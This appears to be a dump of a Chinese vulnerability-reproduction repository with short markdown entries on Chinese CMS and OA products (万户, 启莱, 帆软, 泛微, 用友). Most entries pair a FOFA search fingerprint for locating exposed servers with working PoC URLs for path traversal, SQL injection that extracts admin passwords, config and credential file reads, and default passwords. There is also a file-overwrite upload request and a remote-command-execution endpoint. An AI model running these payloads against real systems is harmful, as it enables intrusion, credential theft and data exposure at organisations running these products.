漏洞复现 18 | 19 | 文件 **thinkphp/library/think/log/driver/Socket.php** 20 | 21 | 这里默认开启日志写入 22 | 23 | ```plain 24 | runtime/log/202104/06.log 25 | ``` 26 | 27 | ![](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202170921409.png) 28 | 29 | 其中可以看到泄露了管理员的Cookie信息和其他敏感信息 30 | 31 | 并且文件命名为 **年+月/日期.log** 32 | 33 | ![](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202170921851.png) 34 | 35 | 这里关注后台的日志文件中的 admin.php页面的cookie就可以获得管理员权限 -------------------------------------------------------------------------------- /CMS漏洞/快排CMS 后台XSS漏洞.md: -------------------------------------------------------------------------------- 1 | # 快排CMS 后台XSS漏洞 2 | 3 | ## 漏洞描述 4 | 5 | 快排CMS 后台存在XSS漏洞,通过后台构造特殊语句可以造成访问网站的用户被XSS影响 6 | 7 | ## 漏洞影响 8 | 9 | ``` 10 | 快排 CMS <= 1.2 11 | ``` 12 | 13 | ## 环境搭建 14 | 15 | https://gitee.com/qingzhanwang/kpcms 16 | 17 | ## 漏洞复现 18 | 19 | 漏洞出现在登录后台的网站编辑的位置,由于没有对输出的字符进行过滤,导致XSS 20 | 21 | ![](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202170922990.png) 22 | 23 | 主页版权处嵌入XSS代码 24 | 25 | ![](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202170922232.png) 26 | 27 | 28 | 29 | ![](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202170923548.png) -------------------------------------------------------------------------------- /CMS漏洞/极致CMS 1.81 后台存储型XSS.md: -------------------------------------------------------------------------------- 1 | # 极致CMS 1.81 后台存储型XSS 2 | 3 | ## 漏洞描述 4 | 5 | 极致CMS后台中存在存储XSS,通过XSS漏洞,可能泄漏敏感信息 6 | 7 | ## 漏洞影响 8 | 9 | ``` 10 | 极致CMS 11 | ``` 12 | 13 | ## FOFA 14 | 15 | ``` 16 | icon_hash="1657387632" 17 | ``` 18 | 19 | ## 漏洞复现 20 | 21 | 网站主页![img](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202170914080.png) 22 | 23 | 登录管理员添加模块 24 | 25 | ![](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202170915540.png) 26 | 27 | 注册用户 28 | 29 | ![](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202170915958.png) 30 | 31 | 点击发布文章 32 | 33 | ![](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202170915367.png) 34 | 35 | 在文章标题处插入xss payload 36 | 37 | - `
` 38 | 39 | 当管理员访问时XSS成功 40 | 41 | ![](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202170915879.png) 42 | 43 | -------------------------------------------------------------------------------- /CMS漏洞/极致CMS 后台文件编辑插件 任意文件上传.md: -------------------------------------------------------------------------------- 1 | # 极致CMS 后台文件编辑插件 任意文件上传 2 | 3 | ## 漏洞描述 4 | 5 | 极致CMS后台中含有文件编辑插件,通过逻辑漏洞可任意修改文件 6 | 7 | ## 漏洞影响 8 | 9 | ``` 10 | 极致CMS 11 | ``` 12 | 13 | ## FOFA 14 | 15 | ``` 16 | icon_hash="1657387632" 17 | ``` 18 | 19 | ## 漏洞复现 20 | 21 | 登陆后台查看插件处,有一个后台编辑的插件 22 | 23 | ![](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202170920402.jpg) 24 | 25 | 安装之后设置密码并使用 26 | 27 | - 如果已经设有密码,重新安装插件即可解决密码未知问题 28 | 29 | ![](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202170920491.jpg) 30 | 31 | 修改为php代码 32 | 33 | ![](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202170920842.jpg) 34 | 35 | 成功执行php代码的命令 -------------------------------------------------------------------------------- /OA产品漏洞/万户OA download_ftp.jsp 任意文件下载漏洞.md: -------------------------------------------------------------------------------- 1 | # 万户OA download_ftp.jsp 任意文件下载漏洞 2 | 3 | ## 漏洞描述 4 | 5 | 万户OA download_ftp.jsp文件存在任意文件下载漏洞,攻击者通过漏洞可以下载服务器上的任意文件 6 | 7 | ## 漏洞影响 8 | 9 | ``` 10 | 万户OA 11 | ``` 12 | 13 | ## FOFA 14 | 15 | ``` 16 | app="万户网络-ezOFFICE" 17 | ``` 18 | 19 | ## 漏洞复现 20 | 21 | 产品页面 22 | 23 | ![image-20220520132512473](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205201325574.png) 24 | 25 | 验证POC 26 | 27 | ``` 28 | /defaultroot/download_ftp.jsp?path=/../WEB-INF/&name=aaa&FileName=web.xml 29 | ``` 30 | 31 | ![image-20220520132537562](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205201325636.png) 32 | 33 | -------------------------------------------------------------------------------- /OA产品漏洞/万户OA download_old.jsp 任意文件下载漏洞.md: -------------------------------------------------------------------------------- 1 | # 万户OA download_old.jsp 任意文件下载漏洞 2 | 3 | ## 漏洞描述 4 | 5 | 万户OA download_old.jsp文件存在任意文件下载漏洞,攻击者通过漏洞可以下载服务器上的任意文件 6 | 7 | ## 漏洞影响 8 | 9 | ``` 10 | 万户OA 11 | ``` 12 | 13 | ## FOFA 14 | 15 | ``` 16 | app="万户网络-ezOFFICE" 17 | ``` 18 | 19 | ## 漏洞复现 20 | 21 | 产品页面 22 | 23 | ![image-20220520132657470](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205201326571.png) 24 | 25 | 验证POC 26 | 27 | ``` 28 | /defaultroot/download_old.jsp?path=..&name=x&FileName=index.jsp 29 | /defaultroot/download_old.jsp?path=..&name=x&FileName=WEB-INF/web.xml 30 | ``` 31 | 32 | ![image-20220520132715066](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205201327151.png) -------------------------------------------------------------------------------- /OA产品漏洞/万户OA downloadhttp.jsp 任意文件下载漏洞.md: -------------------------------------------------------------------------------- 1 | # 万户OA downloadhttp.jsp 任意文件下载漏洞 2 | 3 | ## 漏洞描述 4 | 5 | 万户OA downloadhttp.jsp文件存在任意文件下载漏洞,攻击者通过漏洞可以下载服务器上的任意文件 6 | 7 | ## 漏洞影响 8 | 9 | ``` 10 | 万户OA 11 | ``` 12 | 13 | ## FOFA 14 | 15 | ``` 16 | app="万户网络-ezOFFICE" 17 | ``` 18 | 19 | ## 漏洞复现 20 | 21 | 产品页面 22 | 23 | ![image-20220520132806210](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205201328307.png) 24 | 25 | 验证POC 26 | 27 | ``` 28 | /defaultroot/site/templatemanager/downloadhttp.jsp?fileName=../public/edit/jsp/config.jsp 29 | ``` 30 | 31 | ![image-20220520132818308](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205201328396.png) -------------------------------------------------------------------------------- /OA产品漏洞/启莱OA CloseMsg.aspx SQL注入漏洞.md: -------------------------------------------------------------------------------- 1 | # 启莱OA CloseMsg.aspx SQL注入漏洞 2 | 3 | ## 漏洞描述 4 | 5 | 启莱OA CloseMsg.aspx文件存在SQL注入漏洞,攻击者通过漏洞可以获取数据库敏感信息 6 | 7 | ## 漏洞影响 8 | 9 | ``` 10 | 启莱OA 11 | ``` 12 | 13 | ## FOFA 14 | 15 | ``` 16 | app="启莱OA" 17 | ``` 18 | 19 | ## 漏洞复现 20 | 21 | 登录页面如下 22 | 23 | 存在SQL注入的文件为 CloseMsg.aspx 24 | 25 | ```plain 26 | http://xxx.xxx.xxx.xxx/client/CloseMsg.aspx?user=' and (select db_name())>0--&pwd=1 27 | ``` 28 | 29 | ![qilai-3-1](https://typora-1308934770.cos.ap-beijing.myqcloud.com/qilai-3-1.png) 30 | 31 | 使用SQLmap对参数 user 进行注入 32 | 33 | ![qilai-3-2](https://typora-1308934770.cos.ap-beijing.myqcloud.com/qilai-3-2.png) 34 | -------------------------------------------------------------------------------- /OA产品漏洞/启莱OA messageurl.aspx SQL注入漏洞.md: -------------------------------------------------------------------------------- 1 | # 启莱OA messageurl.aspx SQL注入漏洞 2 | 3 | ## 漏洞描述 4 | 5 | 启莱OA messageurl.aspx文件存在SQL注入漏洞,攻击者通过漏洞可以获取数据库敏感信息 6 | 7 | ## 漏洞影响 8 | 9 | ``` 10 | 启莱OA 11 | ``` 12 | 13 | ## FOFA 14 | 15 | ``` 16 | app="启莱OA" 17 | ``` 18 | 19 | ## 漏洞复现 20 | 21 | 登录页面如下 22 | 23 | ![qilai-2-1](https://typora-1308934770.cos.ap-beijing.myqcloud.com/qilai-2-1.png) 24 | 25 | 存在SQL注入的文件为 messageurl.aspx 26 | 27 | ```plain 28 | http://xxx.xxx.xxx.xxx/client/messageurl.aspx?user=' and (select db_name())>0--&pwd=1 29 | ``` 30 | 31 | ![qilai-2-2](https://typora-1308934770.cos.ap-beijing.myqcloud.com/qilai-2-2.png) 32 | 33 | 使用SQLmap对参数 user 进行注入 34 | 35 | ![qilai-2-3](https://typora-1308934770.cos.ap-beijing.myqcloud.com/qilai-2-3.png) -------------------------------------------------------------------------------- /OA产品漏洞/启莱OA treelist.aspx SQL注入漏洞.md: -------------------------------------------------------------------------------- 1 | # 启莱OA treelist.aspx SQL注入漏洞 2 | 3 | ## 漏洞描述 4 | 5 | 启莱OA treelist.aspx文件存在SQL注入漏洞,攻击者通过漏洞可以获取数据库敏感信息 6 | 7 | ## 漏洞影响 8 | 9 | ``` 10 | 启莱OA 11 | ``` 12 | 13 | ## FOFA 14 | 15 | ``` 16 | app="启莱OA" 17 | ``` 18 | 19 | ## 漏洞复现 20 | 21 | 登录页面如下 22 | 23 | 24 | 25 | ![qilai-1-1](https://typora-1308934770.cos.ap-beijing.myqcloud.com/qilai-1-1.png) 26 | 27 | 存在SQL注入的文件为 treelist.aspx 28 | 29 | ```plain 30 | http://xxx.xxx.xxx.xxx/client/treelist.aspx?user=' and (select db_name())>0--&pwd=1 31 | ``` 32 | 33 | ![qilai-1-2](https://typora-1308934770.cos.ap-beijing.myqcloud.com/qilai-1-2.png) 34 | 35 | 使用SQLmap对参数 user 进行注入 36 | 37 | ![qilai-1-3](https://typora-1308934770.cos.ap-beijing.myqcloud.com/qilai-1-3.png) 38 | 39 | -------------------------------------------------------------------------------- /OA产品漏洞/帆软报表 2012 SSRF漏洞.md: -------------------------------------------------------------------------------- 1 | # 帆软报表 2012 SSRF漏洞 2 | 3 | ## 漏洞描述 4 | 5 | 帆软报表 2012 存在信息泄露漏洞,通过访问特定的Url获取造成SSRF 6 | 7 | ## 漏洞影响 8 | 9 | ``` 10 | 帆软报表 2012 11 | ``` 12 | 13 | ## FOFA 14 | 15 | ``` 16 | body="down.download?FM_SYS_ID" 17 | ``` 18 | 19 | ## 漏洞复现 20 | 21 | 漏洞验证Url为 22 | 23 | ```plain 24 | /ReportServer?op=resource&resource=0m0m6k.dnslog.cn 25 | ``` 26 | 27 | ![image-20220209113126929](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202091131035.png) 28 | 29 | -------------------------------------------------------------------------------- /OA产品漏洞/帆软报表 2012 信息泄露漏洞.md: -------------------------------------------------------------------------------- 1 | # 帆软报表 2012 信息泄露漏洞 2 | 3 | ## 漏洞描述 4 | 5 | 帆软报表 2012 存在信息泄露漏洞,通过访问特定的Url获取部分敏感信息 6 | 7 | ## 漏洞影响 8 | 9 | ``` 10 | 帆软报表 2012 11 | ``` 12 | 13 | ## FOFA 14 | 15 | ``` 16 | body="down.download?FM_SYS_ID" 17 | ``` 18 | 19 | ## 漏洞复现 20 | 21 | 获取登录报表系统的IP 22 | 23 | ```plain 24 | http://xxx.xxx.xxx.xxx/ReportServer?op=fr_server&cmd=sc_visitstatehtml&showtoolbar=false 25 | ``` 26 | 27 | 28 | 29 | ![image-20220209113026424](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202091130468.png) 30 | 31 | 32 | 33 | 数据库信息泄露 34 | 35 | ```plain 36 | http://xxx.xxx.xxx.xxx/ReportServer?op=fr_server&cmd=sc_getconnectioninfo 37 | ``` 38 | 39 | 40 | 41 | ![image-20220209113041021](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202091130098.png) 42 | 43 | 后台默认口令 admin/123456 44 | 45 | ```plain 46 | /ReportServer?op=fr_auth&cmd=ah_login&_=new%20Date().getTime() 47 | ``` -------------------------------------------------------------------------------- /OA产品漏洞/帆软报表 V9 任意文件覆盖文件上传.md: -------------------------------------------------------------------------------- 1 | # 帆软报表 V9 任意文件覆盖文件上传 2 | 3 | ## 漏洞描述 4 | 5 | 帆软 V9 存在任意文件覆盖,导致攻击者可以任意文件上传 6 | 7 | ## 漏洞影响 8 | 9 | ``` 10 | 帆软 V9 11 | ``` 12 | 13 | ## 漏洞复现 14 | 15 | ![314e84b5-e2ac-4e12-9942-653a8b2445a4](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202091128879.png) 16 | 17 | ```plain 18 | POST /WebReport/ReportServer?op=svginit&cmd=design_save_svg&filePath=chartmapsvg/../../../../WebReport/update.jsp HTTP/1.1 19 | Host: 192.168.10.1 20 | Upgrade-Insecure-Requests: 1 21 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36 22 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 23 | Accept-Encoding: gzip, deflate 24 | Accept-Language: zh-CN,zh;q=0.9 25 | Cookie: JSESSIONID=DE7874FC92F0852C84D38935247D947F; JSESSIONID=A240C26B17628D871BB74B7601482FDE 26 | Connection: close 27 | Content-Type:text/xml;charset=UTF-8 28 | 29 | Content-Length: 74 30 | 31 | {"__CONTENT__":"<%out.println(\"Hello World!\");%>","__CHARSET__":"UTF-8"} 32 | ``` 33 | 34 | -------------------------------------------------------------------------------- /OA产品漏洞/新点OA ExcelExport 敏感信息泄露漏洞.md: -------------------------------------------------------------------------------- 1 | # 新点OA ExcelExport 敏感信息泄露漏洞 2 | 3 | ## 漏洞描述 4 | 5 | 新点OA 存在敏感信息泄露漏洞,访问特定的Url时可以获取所有用户的登录名信息,攻击者获取后可以进一步利用 6 | 7 | ## 漏洞影响 8 | 9 | ``` 10 | 新点OA 11 | ``` 12 | 13 | ## FOFA 14 | 15 | ``` 16 | app="新点OA" 17 | ``` 18 | 19 | ## 漏洞复现 20 | 21 | 构造的Url为 22 | 23 | ```plain 24 | /ExcelExport/人员列表.xls 25 | ``` 26 | 27 | 将会下载人员列表文件 28 | 29 | ![xindian](https://typora-1308934770.cos.ap-beijing.myqcloud.com/xindian.png) 30 | 31 | 通过获取的登录名登陆后台(默认密码11111) -------------------------------------------------------------------------------- /OA产品漏洞/智明 SmartOA EmailDownload.ashx 任意文件下载漏洞.md: -------------------------------------------------------------------------------- 1 | # 智明 SmartOA EmailDownload.ashx 任意文件下载漏洞 2 | 3 | ## 漏洞描述 4 | 5 | 智明 SmartOA EmailDownload.ashx文件存在任意文件下载漏洞,通过漏洞可下载服务器上的敏感文件,查看敏感信息 6 | 7 | ## 漏洞影响 8 | 9 | ``` 10 | 智明 SmartOA 11 | ``` 12 | 13 | ## FOFA 14 | 15 | ``` 16 | app="智明协同-SmartOA" 17 | ``` 18 | 19 | ## 漏洞复现 20 | 21 | 登录页面 22 | 23 | ![image-20220520133519986](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205201335202.png) 24 | 25 | 验证POC 26 | 27 | ``` 28 | /file/EmailDownload.ashx?url=~/web.config&name=web.config 29 | ``` 30 | 31 | ![image-20220520133538762](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205201335862.png) -------------------------------------------------------------------------------- /OA产品漏洞/极限OA video_file.php 任意文件读取漏洞.md: -------------------------------------------------------------------------------- 1 | # 极限OA video_file.php 任意文件读取漏洞 2 | 3 | ## 漏洞描述 4 | 5 | 极限OA video_file.php存在任意文件读取漏洞,攻击者通过漏洞可以获取服务器敏感文件 6 | 7 | ## 漏洞影响 8 | 9 | ``` 10 | 极限OA 11 | ``` 12 | 13 | ## FOFA 14 | 15 | ``` 16 | icon_hash="1967132225" 17 | ``` 18 | 19 | ## 漏洞复现 20 | 21 | 登录页面 22 | 23 | ![image-20220715111126095](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202207151111176.png) 24 | 25 | 验证POC 26 | 27 | ``` 28 | /general/mytable/intel_view/video_file.php?MEDIA_DIR=../../../inc/&MEDIA_NAME=oa_config.php 29 | ``` 30 | 31 | ![image-20220715111241562](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202207151112653.png) -------------------------------------------------------------------------------- /OA产品漏洞/泛微OA E-Cology HrmCareerApplyPerView.jsp SQL注入漏洞.md: -------------------------------------------------------------------------------- 1 | # 泛微OA E-Cology HrmCareerApplyPerView.jsp SQL注入漏洞 2 | 3 | ## 漏洞描述 4 | 5 | 泛微OA E-Cology HrmCareerApplyPerView.jsp 文件存在SQL注入漏洞,攻击者通过漏洞可以获取服务器数据库敏感文件 6 | 7 | ## 漏洞影响 8 | 9 | ``` 10 | 泛微OA E-Cology 11 | ``` 12 | 13 | ## FOFA 14 | 15 | ``` 16 | app="泛微-协同办公OA" 17 | ``` 18 | 19 | ## 漏洞复现 20 | 21 | 登录页面 22 | 23 | ![image-20220706133317122](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202207061333252.png) 24 | 25 | 验证POC 26 | 27 | ``` 28 | /pweb/careerapply/HrmCareerApplyPerView.jsp?id=1 union select 1,2,sys.fn_sqlvarbasetostr(HashBytes('MD5','abc')),db_name(1),5,6,7 29 | ``` 30 | 31 | ![image-20220706133435321](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202207061334390.png) -------------------------------------------------------------------------------- /OA产品漏洞/泛微OA E-Cology LoginSSO.jsp SQL注入漏洞 CNVD-2021-33202.md: -------------------------------------------------------------------------------- 1 | # 泛微OA E-Cology LoginSSO.jsp SQL注入漏洞 CNVD-2021-33202 2 | 3 | ## 漏洞描述 4 | 5 | 泛微e-cology是专为大中型企业制作的OA办公系统,支持PC端、移动端和微信端同时办公等。 泛微e-cology存在SQL注入漏洞。攻击者可利用该漏洞获取敏感信息。 6 | 7 | ## 漏洞影响 8 | 9 | ``` 10 | 泛微e-cology 8.0 11 | ``` 12 | 13 | ## FOFA 14 | 15 | ``` 16 | app="泛微-协同办公OA" 17 | ``` 18 | 19 | ## 漏洞复现 20 | 21 | 登录页面 22 | 23 | ![image-20220520133932334](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205201339405.png) 24 | 25 | 验证POC 26 | 27 | ``` 28 | /upgrade/detail.jsp/login/LoginSSO.jsp?id=1%20UNION%20SELECT%20password%20as%20id%20from%20HrmResourceManager 29 | ``` 30 | 31 | ![image-20220520134011931](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205201340985.png) -------------------------------------------------------------------------------- /OA产品漏洞/泛微OA E-Cology getSqlData SQL注入漏洞.md: -------------------------------------------------------------------------------- 1 | # 泛微OA E-Cology getSqlData SQL注入漏洞 2 | 3 | ## 漏洞描述 4 | 5 | 泛微e-cology是专为大中型企业制作的OA办公系统,支持PC端、移动端和微信端同时办公等。 泛微e-cology存在SQL注入漏洞。攻击者可利用该漏洞获取敏感信息。 6 | 7 | ## 漏洞影响 8 | 9 | ``` 10 | 泛微e-cology 8.0 11 | ``` 12 | 13 | ## FOFA 14 | 15 | ``` 16 | app="泛微-协同办公OA" 17 | ``` 18 | 19 | ## 漏洞复现 20 | 21 | 登录页面 22 | 23 | ![image-20220520133932334](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205201341203.png) 24 | 25 | 验证POC 26 | 27 | ``` 28 | /Api/portal/elementEcodeAddon/getSqlData?sql=select%20@@version 29 | ``` 30 | 31 | ![image-20220520134115167](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205201341226.png) 32 | -------------------------------------------------------------------------------- /OA产品漏洞/泛微OA E-Cology users.data 敏感信息泄漏.md: -------------------------------------------------------------------------------- 1 | # 泛微OA E-Cology users.data 敏感信息泄漏 2 | 3 | ## 漏洞描述 4 | 5 | 泛微OA E-Cology users.data 允许任意用户下载,获取OA中的敏感信息 6 | 7 | ## 漏洞影响 8 | 9 | ``` 10 | 泛微OA E-Cology 11 | ``` 12 | 13 | ## FOFA 14 | 15 | ``` 16 | app="泛微-协同商务系统" 17 | ``` 18 | 19 | ## 漏洞复现 20 | 21 | 登录页面 22 | 23 | ![image-20220520134158756](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205201341810.png) 24 | 25 | 验证POC 26 | 27 | ``` 28 | /messager/users.data 29 | ``` 30 | 31 | ![image-20220520134209598](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205201342693.png) 32 | 33 | base64 GBK解码 -------------------------------------------------------------------------------- /OA产品漏洞/泛微OA E-Office UserSelect 未授权访问漏洞.md: -------------------------------------------------------------------------------- 1 | # 泛微OA E-Office UserSelect 未授权访问漏洞 2 | 3 | ## 漏洞描述 4 | 5 | 泛微OA E-Office UserSelect接口存在未授权访问漏洞,通过漏洞攻击者可以获取敏感信息 6 | 7 | ## 漏洞影响 8 | 9 | ``` 10 | 泛微OA E-Office 11 | ``` 12 | 13 | ## FOFA 14 | 15 | ``` 16 | app="泛微-EOffice" 17 | ``` 18 | 19 | ## 漏洞复现 20 | 21 | 登录页面 22 | 23 | ![image-20220520134445854](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205201344907.png) 24 | 25 | 验证POC 26 | 27 | ``` 28 | /UserSelect/ 29 | ``` 30 | 31 | ![image-20220520140409297](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205201404369.png) -------------------------------------------------------------------------------- /OA产品漏洞/泛微OA E-Office mysql_config.ini 数据库信息泄漏漏洞.md: -------------------------------------------------------------------------------- 1 | # 泛微OA E-Office mysql_config.ini 数据库信息泄漏漏洞 2 | 3 | ## 漏洞描述 4 | 5 | 泛微 E-Office mysql_config.ini文件可直接访问,泄漏数据库账号密码等信息 6 | 7 | ## 漏洞影响 8 | 9 | ``` 10 | 泛微 E-Office 11 | ``` 12 | 13 | ## FOFA 14 | 15 | ``` 16 | app="泛微-EOffice" 17 | ``` 18 | 19 | ## 漏洞复现 20 | 21 | 产品页面 22 | 23 | ![img](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202091048925.png) 24 | 25 | 验证POC 26 | 27 | ```php 28 | /mysql_config.ini 29 | ``` 30 | 31 | ![img](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202091048869.png) -------------------------------------------------------------------------------- /OA产品漏洞/泛微OA E-Office officeserver.php 任意文件读取漏洞.md: -------------------------------------------------------------------------------- 1 | # 泛微OA E-Office officeserver.php 任意文件读取漏洞 2 | 3 | ## 漏洞描述 4 | 5 | 泛微OA E-Office officeserver.php文件存在任意文件读取漏洞,攻击者通过漏洞可以下载服务器上的任意文件 6 | 7 | ## 漏洞影响 8 | 9 | ``` 10 | 泛微OA E-Office 11 | ``` 12 | 13 | ## FOF 14 | 15 | ``` 16 | app="泛微-EOffice" 17 | ``` 18 | 19 | ## 漏洞复现 20 | 21 | 登录页面 22 | 23 | ![image-20220520140739224](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205201407281.png) 24 | 25 | 验证POC 26 | 27 | ``` 28 | /iweboffice/officeserver.php?OPTION=LOADFILE&FILENAME=../mysql_config.ini 29 | ``` 30 | 31 | ![image-20220520140749985](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205201407034.png) -------------------------------------------------------------------------------- /OA产品漏洞/泛微OA E-Weaver SignatureDownLoad 任意文件读取漏洞.md: -------------------------------------------------------------------------------- 1 | # 泛微OA E-Weaver SignatureDownLoad 任意文件读取漏洞 2 | 3 | ## 漏洞描述 4 | 5 | 泛微OA E-Weaver SignatureDownLoad接口存在任意文件读取漏洞,攻击者通过漏洞可以读取服务器任意文件 6 | 7 | ## 漏洞影响 8 | 9 | 泛微OA E-Weaver 10 | 11 | ## FOFA 12 | 13 | ``` 14 | app="泛微-E-Weaver" 15 | ``` 16 | 17 | ## 漏洞复现 18 | 19 | ![image-20220706133659005](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202207061336151.png) 20 | 21 | 验证POC 22 | 23 | ``` 24 | /weaver/weaver.file.SignatureDownLoad?markId=0%20union%20select%20%27C:/Windows/win.ini%27 25 | ``` 26 | 27 | ![image-20220706133707852](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202207061337908.png) 28 | 29 | ``` 30 | /weaver/weaver.file.SignatureDownLoad?markId=0%20union%20select%20%27../ecology/WEB-INF/prop/weaver.properties%27 31 | ``` 32 | 33 | ![image-20220706133717202](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202207061337932.png) -------------------------------------------------------------------------------- /OA产品漏洞/泛微OA ln.FileDownload 任意文件读取漏洞.md: -------------------------------------------------------------------------------- 1 | # 泛微OA ln.FileDownload 任意文件读取漏洞 2 | 3 | ## 漏洞描述 4 | 5 | 泛微OA ln.FileDownload 接口存在任意文件读取漏洞,攻击者通过漏洞可以获取服务器任意文件 6 | 7 | ## 漏洞影响 8 | 9 | ``` 10 | 泛微OA V8 11 | ``` 12 | 13 | ## FOFA 14 | 15 | ``` 16 | app="泛微-协同办公OA" 17 | ``` 18 | 19 | ## 漏洞复现 20 | 21 | 登陆页面 22 | 23 | ![image-20220520141045902](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205201410983.png) 24 | 25 | 验证POC 26 | 27 | ``` 28 | /weaver/ln.FileDownload?fpath=../ecology/WEB-INF/web.xml 29 | ``` 30 | 31 | ![image-20220520141058500](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205201410567.png) -------------------------------------------------------------------------------- /OA产品漏洞/用友 ERP-NC NCFindWeb 目录遍历漏洞.md: -------------------------------------------------------------------------------- 1 | # 用友 ERP-NC NCFindWeb 目录遍历漏洞 2 | 3 | ## 漏洞描述 4 | 5 | 用友ERP-NC 存在目录遍历漏洞,攻击者可以通过目录遍历获取敏感文件信息 6 | 7 | ## 漏洞影响 8 | 9 | ``` 10 | 用友ERP-NC 11 | ``` 12 | 13 | ## FOFA 14 | 15 | ``` 16 | app="用友-UFIDA-NC" 17 | ``` 18 | 19 | ## 漏洞复现 20 | 21 | POC为 22 | 23 | ```plain 24 | /NCFindWeb?service=IPreAlertConfigService&filename= 25 | ``` 26 | 27 | ![yongyou-8-1](https://typora-1308934770.cos.ap-beijing.myqcloud.com/yongyou-8-1.png) 28 | 29 | 查看 ncwslogin.jsp 文件 30 | 31 | ![yongyou-8-2](https://typora-1308934770.cos.ap-beijing.myqcloud.com/yongyou-8-2.png) -------------------------------------------------------------------------------- /OA产品漏洞/用友 FE协作办公平台 templateOfTaohong_manager.jsp 目录遍历漏洞.md: -------------------------------------------------------------------------------- 1 | # 用友 FE协作办公平台 templateOfTaohong_manager.jsp 目录遍历漏洞 2 | 3 | ## 漏洞描述 4 | 5 | 用友 FE协作办公平台 templateOfTaohong_manager.jsp文件存在目录遍历漏洞,通过漏洞攻击者可以获取目录文件等信息,导致进一步攻击 6 | 7 | ## 漏洞影响 8 | 9 | ``` 10 | 用友 FE协作办公平台 11 | ``` 12 | 13 | ## FOFA 14 | 15 | ``` 16 | "FE协作" 17 | ``` 18 | 19 | ## 漏洞复现 20 | 21 | 登录页面 22 | 23 | ![image-20220520141413849](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205201414968.png) 24 | 25 | 验证POC 26 | 27 | ``` 28 | /system/mediafile/templateOfTaohong_manager.jsp?path=/../../../ 29 | ``` 30 | 31 | ![image-20220520141519859](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205201415920.png) -------------------------------------------------------------------------------- /OA产品漏洞/用友 NC NCFindWeb 任意文件读取漏洞.md: -------------------------------------------------------------------------------- 1 | # 用友 NC NCFindWeb 任意文件读取漏洞 2 | 3 | ## 漏洞描述 4 | 5 | 用友NC存在任意文件读取漏洞,攻击者通过漏洞可读取服务器敏感文件 6 | 7 | ## 漏洞影响 8 | 9 | ``` 10 | 用友NC 11 | ``` 12 | 13 | ## FOFA 14 | 15 | ``` 16 | icon_hash="1085941792" 17 | ``` 18 | 19 | ## 漏洞复现 20 | 21 | 登陆页面 22 | 23 | ![img](https://typora-1308934770.cos.ap-beijing.myqcloud.com/1628351304159-f00b4a4f-a104-40f4-a8bf-1ea00cf72c98.png) 24 | 25 | 验证POC **/NCFindWeb?service=IPreAlertConfigService&filename=WEB-INF/web.xml** 26 | 27 | ![img](https://typora-1308934770.cos.ap-beijing.myqcloud.com/1628351371286-e2898425-5e54-438a-b5eb-4f20eed3636b.png) 28 | 29 | -------------------------------------------------------------------------------- /OA产品漏洞/用友 NC bsh.servlet.BshServlet 远程命令执行漏洞.md: -------------------------------------------------------------------------------- 1 | # 用友 NC bsh.servlet.BshServlet 远程命令执行漏洞 2 | 3 | ## 漏洞描述 4 | 5 | 用友 NC bsh.servlet.BshServlet 存在远程命令执行漏洞,通过BeanShell 执行远程命令获取服务器权限 6 | 7 | ## 漏洞影响 8 | 9 | ``` 10 | 用友 NC 11 | ``` 12 | 13 | ## FOFA 14 | 15 | ``` 16 | icon_hash="1085941792" 17 | ``` 18 | 19 | ## 漏洞复现 20 | 21 | 访问页面如下 22 | 23 | ![yongyou-4-1](https://typora-1308934770.cos.ap-beijing.myqcloud.com/yongyou-4-1.png) 24 | 25 | 漏洞Url为 26 | 27 | ```plain 28 | /servlet/~ic/bsh.servlet.BshServlet 29 | ``` 30 | 31 | 